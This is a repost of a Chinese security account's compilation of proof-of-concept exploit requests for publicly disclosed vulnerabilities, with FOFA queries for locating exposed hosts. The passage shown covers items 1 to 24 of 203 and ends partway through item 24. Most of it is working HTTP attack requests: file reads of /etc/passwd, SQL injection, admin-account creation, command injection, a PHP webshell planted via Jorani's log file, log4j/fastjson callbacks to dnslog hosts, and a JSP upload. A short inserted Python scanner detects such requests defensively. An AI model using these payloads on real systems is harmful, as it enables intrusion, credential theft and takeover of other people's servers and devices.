
Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

[复制链接]
跳转到指定楼层
楼主
Posted on 2024-6-5 14:31:29
道一安全, 2024-06-05 07:41, Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of offensive activity, and this article is meant to help defenders. Defenders can use its contents to check their own exposure.

Source: the article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all collected from other public accounts or websites and compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is already the most complete version; press F12 and search for a keyword when using it.

Save this article if you need it. You can also follow this public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运主动安全监控云平台 arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC智能物联综合管理平台 arbitrary file read
21. 大华ICC智能物联综合管理平台 random remote code execution
22. 大华ICC智能物联综合管理平台 log4j remote code execution
23. 大华ICC智能物联综合管理平台 fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud 政府财务云 arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空社会化商业 ERP validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart管理平台 importexport.php SQL injection
61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园服务管理平台 service.action remote command execution
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
79. BYTEVALUE 百为流控路由器 remote command execution
80. 速达天耀软件 DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒明御安全网关 aaa_local_web_preview file upload
88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
89. 致远互联FE协作办公平台 editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
92. 海康威视运行管理中心 session command execution
93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600防火墙 obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视高清智能录播系统 busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210管理平台 uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40管理平台 import web.php arbitrary file upload
121. 北京百绰智能 S42管理平台 userattestation.php arbitrary file upload
122. 北京百绰智能 s200管理平台 /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研工程质量检测系统 arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu客服系统 arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5云商城 file.php file upload
134. 网康NS-ASG应用安全网关 index.php SQL injection
135. 网康NS-ASG应用安全网关 list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅通信指挥调度平台 down_file.php SQL injection
138. 福建科立讯通信指挥调度平台 pwd_update.php SQL injection
139. 福建科立讯通信指挥调度平台 editemedia.php SQL injection
140. 福建科立讯通信指挥调度平台 get_extension_yl.php SQL injection
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL injection
142. CMSV6车辆监控平台 weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔消防救援作战调度平台 SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达医学影像存档与通信系统 WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信票务管理平台 SeatMapHandler SQL injection
167. 精益价值管理系统 DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6车载定位监控平台 SQL injection
172. DT-高清车牌识别摄像机 arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. 电信网关配置管理系统 rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C校园网自助服务系统 flexfileupload arbitrary file upload
179. 建文工程管理系统 arbitrary file read
180. 帮管客CRM jiliyu SQL injection
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼应用虚拟化系统 SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会视频会议 attachment arbitrary file read
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
190. 短视频矩阵营销系统 poihuoqu arbitrary file read
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
195. 飞鱼星上网行为管理系统 send_order.cgi command execution
196. 河南省风速科技统一认证平台 password reset
197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS海洋影视管理系统 dmku SQL injection
201. 方正全媒体新闻采编系统 binary SQL injection
202. 微擎系统 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your chosen password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运主动安全监控云平台 arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained after logging in>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

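The file-read POCs in sections 2, 6 and 7 and the double-encoded injection in section 9 all get past checks that match on the raw request target instead of on its normalized form. The Python below is an added example from this editor, not code from the original article or from any of the vendors named: it percent-decodes a value until it stops changing, collapses `./` and `../` segments, and only then looks for traversal, sensitive file names and SQL function markers. The access-log lines are constructed, with made-up client IPs and timestamps; the request targets mirror the POCs above.

```python
import posixpath
import re
import urllib.parse
from typing import Dict, List, Tuple

# Constructed sample in combined log format (not real traffic). The targets
# follow the POCs above; client addresses and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1849
10.0.0.5 - - [05/Jun/2024:10:00:02 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1849
10.0.0.7 - - [05/Jun/2024:10:00:03 +0800] "GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38 HTTP/1.1" 500 0
10.0.0.9 - - [05/Jun/2024:10:00:04 +0800] "GET /static/css/app.css HTTP/1.1" 200 4120
10.0.0.9 - - [05/Jun/2024:10:00:05 +0800] "GET /search/index.php?keyword=printer HTTP/1.1" 200 912
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# MySQL error-based injection helpers seen in sections 9, 17 and 19, plus UNION.
SQLI_RE = re.compile(
    r"\b(?:extractvalue|updatexml)\s*\(|concat\s*\(\s*0x7e|\bunion\s+select\b",
    re.IGNORECASE,
)
# File names the file-read POCs above go after; matched after normalization.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "win.ini", "jdbc.properties", "/web-inf/")


def percent_decode_fully(value: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Percent-decode until the value stops changing; return (decoded, rounds used)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def has_traversal(path: str) -> bool:
    """True if any segment of the decoded path is '..' (checked before collapsing)."""
    return any(segment == ".." for segment in path.split("/"))


def refers_to_sensitive_file(value: str) -> bool:
    """Collapse './' and '../' the way the server's filesystem would, then match."""
    collapsed = posixpath.normpath(value.lower())
    return any(marker in collapsed for marker in SENSITIVE_FILES)


def analyze_target(target: str) -> List[str]:
    """Return the list of reasons a request target looks hostile (empty if clean)."""
    reasons: List[str] = []
    path, _, query = target.partition("?")
    decoded_path, _ = percent_decode_fully(path)
    if has_traversal(decoded_path):
        reasons.append("path traversal")
    if refers_to_sensitive_file(decoded_path):
        reasons.append("sensitive file in path")
    # parse_qsl already removes one layer of encoding; any further round means
    # the client sent a value that was percent-encoded at least twice.
    for key, once_decoded in urllib.parse.parse_qsl(query, keep_blank_values=True):
        value, extra_rounds = percent_decode_fully(once_decoded)
        if SQLI_RE.search(value):
            reasons.append(f"sql injection marker in '{key}'")
        if extra_rounds >= 1:
            reasons.append(f"double percent-encoding in '{key}'")
        if refers_to_sensitive_file(value):
            reasons.append(f"sensitive file path in '{key}'")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Run analyze_target over every request line; keep only the flagged ones."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = analyze_target(match.group("target"))
        if reasons:
            findings.append({"client": line.split(" ", 1)[0],
                             "target": match.group("target"),
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["client"], finding["target"], "->", "; ".join(finding["reasons"]))
```

The extra decoding round is a signal in its own right: a normal client rarely sends a parameter that still contains percent-escapes after the server has decoded it once, so a second round is worth alerting on even when no SQL marker matches.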
10. 蓝凌EIS智慧协同平台 api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie first.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the written-in function executes a command that is supplied base64-encoded in a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target to run the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆HFOffice医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. 大华ICC智能物联综合管理平台 arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. 大华ICC智能物联综合管理平台 random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. 大华ICC智能物联综合管理平台 log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. 大华ICC智能物联综合管理平台 fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}


24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
